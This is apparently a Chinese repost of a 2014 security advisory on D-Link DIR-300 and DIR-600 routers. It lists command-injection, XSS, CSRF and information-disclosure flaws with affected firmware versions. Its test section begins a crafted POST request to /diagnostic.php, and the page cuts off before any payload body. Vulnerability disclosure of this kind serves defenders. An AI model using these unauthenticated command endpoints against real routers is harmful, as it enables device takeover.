D-Link DIR-600和DIR-300多个安全漏洞下载

来源:黑吧安全网 浏览:1357次 时间:2014-04-30
做网站找雨过天晴工作室

 受影响系统:

D-Link DIR-300 
D-Link DIR-600

描述:


BUGTRAQ  ID: 59405

D-Link DIR-600和DIR-300均是无线路由器产品。

D-Link DIR-600和DIR-300在实现上存在多个安全漏洞,包括多个命令注入漏洞、跨站请求伪造漏洞、跨站脚本漏洞、密码加密漏洞、信息泄露漏洞、HTTP标头注入漏洞、安全措施绕过漏洞,恶意用户可利用这些漏洞泄露某些系统信息、解密已存储密码、在受影响设备上下文中执行任意命令、窃取cookie身份验证凭证、在用户会话上下文中执行未授权操作、重定向用户到任意站点、HTTP请求走私并控制受影响设备。

1、设备没有限制对router_info.xml的访问,通过错误消息可泄露完整路径;
2、设备没有限制对DevInfo.txt和version.txt的访问,可造成某些设备信息泄露;
3、设备没有限制对command.php的访问,通过特制的HTTP请求,可导致执行任意shell命令。影响范围:D-Link DIR-300 v2.12和2.13、D-Link DIR-600 v2.12b02, 2.13b01, 2.14b01.
4、设备没有限制对diagnostic.php的访问,通过特制的HTTP请求,可导致执行某些OS命令。影响范围:D-Link DIR-300 v2.13b01、D-Link DIR-600 v2.15b01之前版本

<*来源:Michael Messner (michae.messner@integralis.com
  
  链接:http://www.securelist.com/en/advisories/52080
        http://www.s3cur1ty.de/m1adv2013-003
        http://www.s3cur1ty.de/m1adv2013-017
*>

测试方法:


警 告
以下程序(方法)可能带有攻击性,仅供安全研究与教学之用。使用者风险自负!

Michael Messner (michae.messner@integralis.com)提供了如下测试方法:

* OS命令注入:
POST /diagnostic.php HTTP/1.1
Host: xxxx
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:16.0) Gecko/20100101 Firefox/16.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: de-de,de;q=0.8,en-us;q=0.5,en;q=0.3

[1] [2]  下一页